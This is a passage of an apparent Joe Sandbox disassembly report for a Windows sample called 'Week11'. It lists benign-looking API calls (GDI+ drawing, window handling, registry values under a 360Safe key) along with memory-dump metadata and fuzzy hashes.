                                • PostMessageW.USER32(?,00000012,00000000,00000000), ref: 0046C1B1
                                • DestroyWindow.USER32(?,?,?,?,?,1D1D1D8C,?,?), ref: 0046C1C2
                                Similarity
                                • API ID: Window$Message$DestroyDispatchPostShowTranslate
                                • String ID:
                                APIs
                                • _memset.LIBCMT ref: 004AA6E2
                                  • Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A9625
                                  • Part of subcall function 004A95F0: _memset.LIBCMT ref: 004A96CB
                                  • Part of subcall function 004A95F0: _strncat.LIBCMT ref: 004A974F
                                • _memset.LIBCMT ref: 004AA769
                                • SHGetValueA.SHLWAPI ref: 004AA79A
                                • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid_old,00000001,?,?), ref: 004AA809
                                • SHSetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,00000001,?,?), ref: 004AA838
                                Similarity
                                • API ID: _memset$Value$_strncat
                                • String ID: Software\360Safe\Liveup$mid$mid_old
                                APIs
                                • _memset.LIBCMT ref: 004AA1C5
                                  • Part of subcall function 004A9440: GetProcAddress.KERNEL32(00000000,Netbios), ref: 004A9463
                                • _memset.LIBCMT ref: 004AA206
                                • _memset.LIBCMT ref: 004AA227
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _memset$AddressProc
                                • String ID: %02X%02X%02X%02X%02X%02X$* $2$3$7
                                • API String ID: 2047085092-1802369251
                                • Opcode ID: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
                                • Instruction ID: b5185da48c56e3bb05fd49e8d578d0ee374eb835078e2a388012ba28b7154dd0
                                • Opcode Fuzzy Hash: 2ae8f57defed816fcd0dbdf2e043d280dfe4faec22ec5c4774c4ddad453272f2
                                • Instruction Fuzzy Hash: FC41377150C3805FD321DB258C81BAB7BE86FEA304F4848AEF59947293D27C9619C76B
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004245C6
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004245DD
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 004245EB
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 0042461D
                                • GdipSetPixelOffsetMode.GDIPLUS(00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424645
                                • GdipSetSmoothingMode.GDIPLUS(?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?,00000010,?,?,?,?), ref: 00424656
                                • GdipDrawImageRectI.GDIPLUS(?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000,?), ref: 004246BD
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A,00000000), ref: 004246D2
                                • GdipFree.GDIPLUS(?,00000000,?,00000000,?,00000000,?,?,?,00000004,00000000,00000002,?,?,00000000,0026200A), ref: 004246D8
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Image$Mode$AllocBitmapCreateDeleteDrawFreeFromGraphicsHeightOffsetPixelRectScan0SmoothingWidth
                                • String ID:
                                • API String ID: 4157487250-0
                                • Opcode ID: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
                                • Instruction ID: 2d8f88f892067c8462d36ef45ad906f247f62c8cedfde0274191c8c77dfeeccb
                                • Opcode Fuzzy Hash: e3cf0a69b922c1f095475634fdfa1c3cf12872b3884a6a262bca07d32cf31a50
                                • Instruction Fuzzy Hash: CB41D671B00229AFDB20EFA9E8C196EB3F8EF85318B50456FF949D7300D638AD518B54
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 00442769
                                • SysFreeString.OLEAUT32(00000000), ref: 0044278B
                                • SysStringLen.OLEAUT32(?), ref: 0044279B
                                • SysStringLen.OLEAUT32(?), ref: 004427A5
                                • CoTaskMemAlloc.OLE32(00000002), ref: 004427AC
                                • SysFreeString.OLEAUT32(?), ref: 004427BF
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: String$AllocFree$Task
                                • String ID:
                                • API String ID: 1511711959-0
                                • Opcode ID: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
                                • Instruction ID: 49859850150a05cee1c5faa8b7596b5dd248a8acb7461314ecf7bfa1790a2522
                                • Opcode Fuzzy Hash: af17a773843fe2677d21ba650797fdc4f39f0b8e8a526ef2a21419ef42245db8
                                • Instruction Fuzzy Hash: D8214F7A2001086BEB00DF69DC84DAB7BACEFC8750B15852AFD08CB301D675E952CBB4
                                APIs
                                  • Part of subcall function 004822CA: GetParent.USER32(?), ref: 0048231E
                                  • Part of subcall function 004822CA: GetLastActivePopup.USER32(?), ref: 0048232F
                                  • Part of subcall function 004822CA: IsWindowEnabled.USER32(?), ref: 00482343
                                  • Part of subcall function 004822CA: EnableWindow.USER32(?,00000000), ref: 00482356
                                • EnableWindow.USER32(?,00000001), ref: 004823B7
                                • GetWindowThreadProcessId.USER32(?,?), ref: 004823CB
                                • GetCurrentProcessId.KERNEL32(?,?), ref: 004823D5
                                • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 004823ED
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 00482469
                                • EnableWindow.USER32(00000000,00000001), ref: 004824B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                • String ID: 0
                                • API String ID: 1877664794-4108050209
                                • Opcode ID: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
                                • Instruction ID: 8e585c70b680c40b4d562465b8605060ad5ecccd812445ed05c6be24a330da52
                                • Opcode Fuzzy Hash: 3a17390735f5fddf6c080ee8498bc24afbfb48a6793156dff0f54a77fe800a1c
                                • Instruction Fuzzy Hash: 13410671A00218ABCB21EF24DD85BDE77B8FF14710F10099AF815D6290D7B8CE81CBA8
                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5A9
                                • __CxxThrowException@8.LIBCMT ref: 0047A5D9
                                • TlsSetValue.KERNEL32(?,00000000,?,00475D38,00000000,00000000,00000CCC,00000040,?,?,?,00004000), ref: 0047A5EE
                                • __CxxThrowException@8.LIBCMT ref: 0047A608
                                • ReleaseMutex.KERNEL32(?,00000004,004CD9E8), ref: 0047A63E
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Exception@8Throw$MutexObjectReleaseSingleValueWait
                                • String ID: (bN
                                • API String ID: 2684265641-263236600
                                • Opcode ID: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
                                • Instruction ID: 27f496866d8990fa095e078a65faca75cb8b74751a1e4995d36bfee892cf5d78
                                • Opcode Fuzzy Hash: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
                                • Instruction Fuzzy Hash: 3731FB71A002049BC710DFA8DC84AAEB7F8EB95774F244B6BE425E7390D73DD9018B99
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 004841D1
                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004841FB
                                • GetSystemMetrics.USER32(00000000), ref: 00484212
                                • GetSystemMetrics.USER32(00000001), ref: 00484219
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 00484244
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                                • String ID: B$DISPLAY
                                • API String ID: 381819527-3316187204
                                • Opcode ID: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
                                • Instruction ID: 37ba2623ab80b836d71301728680889a1d878128fbe626e42cca22548f8401ec
                                • Opcode Fuzzy Hash: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
                                • Instruction Fuzzy Hash: BC214CB1604322ABDF20AF10CC88B6F7B6CEF85761F104567FD159B185D678D840CBA8
                                APIs
                                • GdipResetPath.GDIPLUS(?), ref: 0042471A
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB
                                • GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424803
                                • GdipClosePathFigure.GDIPLUS(?,?,?,?), ref: 00424812
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: GdipPath$CloseFigureReset
                                • String ID:
                                • API String ID: 1165678104-0
                                • Opcode ID: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
                                • Instruction ID: d8f18a0501c3a013d271e56735f09573a319e5fd5543ef274777617e319d1d18
                                • Opcode Fuzzy Hash: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
                                • Instruction Fuzzy Hash: B651A274A00120EF8B14EF69E989D6B7FB9EFC5350B40C55AE858DB248D734EC50CBA9
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0045E07D
                                • GetParent.USER32 ref: 0045E088
                                • GetWindowRect.USER32(00000000), ref: 0045E08F
                                  • Part of subcall function 0047F630: MonitorFromRect.USER32(?,00000002), ref: 0047F638
                                  • Part of subcall function 0047F630: GetMonitorInfoW.USER32 ref: 0047F67A
                                  • Part of subcall function 0047F630: MulDiv.KERNEL32(00000014,?,00000064), ref: 0047F697
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6BE
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6D3
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6E8
                                  • Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6FD
                                • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E0FC
                                • ShowWindow.USER32(?,00000005,?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E105
                                • SetWindowPos.USER32(?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E128
                                • ShowWindow.USER32(?,00000005,?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E12D
                                • SetWindowPos.USER32(?,000000FE,?,?,00000000,00000000,00000001,?,00000005,?,000000FF,?,?,00000000,00000000,00000001), ref: 0045E144
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Rect$Window$Offset$MonitorShow$ClientFromInfoParent
                                • String ID:
                                • API String ID: 3049569217-0
                                • Opcode ID: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
                                • Instruction ID: 546e9c3f4b5c4d5a21c1283eb3a080c89236ab16e2df80ef0f790bdbc6c9b076
                                • Opcode Fuzzy Hash: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
                                • Instruction Fuzzy Hash: 44313EB5E00219ABDF14CFB8DD49FEEBBB9EB48311F144259F911B3280D674A900CB64
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004244F5
                                • GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0042450C
                                • GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042451A
                                • GdipGetImagePixelFormat.GDIPLUS(?,?,00000010,?,?,?,?), ref: 0042452D
                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424554
                                • GdipGetImageGraphicsContext.GDIPLUS(?,?,?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424573
                                • GdipDrawImageRectI.GDIPLUS(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0042458B
                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00424591
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Image$Graphics$AllocBitmapContextCreateDeleteDrawFormatFromHeightPixelRectScan0Width
                                • String ID:
                                • API String ID: 2487541727-0
                                • Opcode ID: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
                                • Instruction ID: e440d22e4396f5d12bb9ec9e6ce0b4ce439fd3521e5479917a7f6efb2c510700
                                • Opcode Fuzzy Hash: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
                                • Instruction Fuzzy Hash: 1A2141B5A0011ABFDB10DFA9D881AAEF7F8FB54308F10856EF518D3200D674AD418BA5
                                APIs
                                • GetClassLongW.USER32(?,000000E6), ref: 004342B6
                                • SetClassLongW.USER32(?,000000E6,00000000), ref: 004342C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ClassLong
                                • String ID: $RN$%s%s$T9N$default
                                • API String ID: 582411763-3915848410
                                • Opcode ID: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
                                • Instruction ID: 215032063d526a6b60c1858507d6e0e35a73955875a6123a1949ccb04bec6185
                                • Opcode Fuzzy Hash: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
                                • Instruction Fuzzy Hash: C2C17931208341ABD710DF69C881B9BB7E4AFD9708F14491EF944AB391C778ED46CB9A
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 0045E48B
                                • EnterCriticalSection.KERNEL32(?), ref: 0045E49F
                                • LeaveCriticalSection.KERNEL32(?), ref: 0045E4B7
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                 • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$CurrentEnterLeaveThread
                                • String ID: FileSmasher\comfirmdlg.xml$IDS_MSG_TITLE$IDS_POP_LOGO_IMGID
                                • API String ID: 2351996187-460408531
                                • Opcode ID: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
                                • Instruction ID: 1b0f27efa783b1bd38bf54292848568ffc2e723f9f63cdb7e22d6f21943f4c07
                                • Opcode Fuzzy Hash: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
                                • Instruction Fuzzy Hash: F5A1C371204301AFE714DF66CC81F4B77E8AF59714F10452EFA04AB282E739E909CB9A
                                APIs
                                • IsWindow.USER32(00000007), ref: 00430624
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004307ED
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseHandleWindow
                                • String ID: %d:%s,%s$T9N$`$pK
                                • API String ID: 3235909452-1085668790
                                • Opcode ID: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
                                • Instruction ID: e060a5e3de00ca8db65478713cfe5ef3418896bd8cf46b1bc53b4f3ec04077e5
                                • Opcode Fuzzy Hash: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
                                • Instruction Fuzzy Hash: 53A1907190024AEFDB04DF95C881B9EB7B4FF48314F14862EE815A7381D778AA45CBE4
                                APIs
                                • CopyRect.USER32(?,?), ref: 004286D1
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 00428705
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 0042874C
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,1D1D1D8C), ref: 0042879F
                                • GdipDeleteBrush.GDIPLUS(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?), ref: 004287A8
                                • GdipDeleteFont.GDIPLUS(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?), ref: 004287B1
                                • GdipDeleteFontFamily.GDIPLUS(?,00000000,?,?,?,?,1D1D1D8C), ref: 004287BD
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$Delete$FontFormatString$BrushCopyCreateFamilyHintRectRenderingText
                                • String ID:
                                • API String ID: 3759438238-0
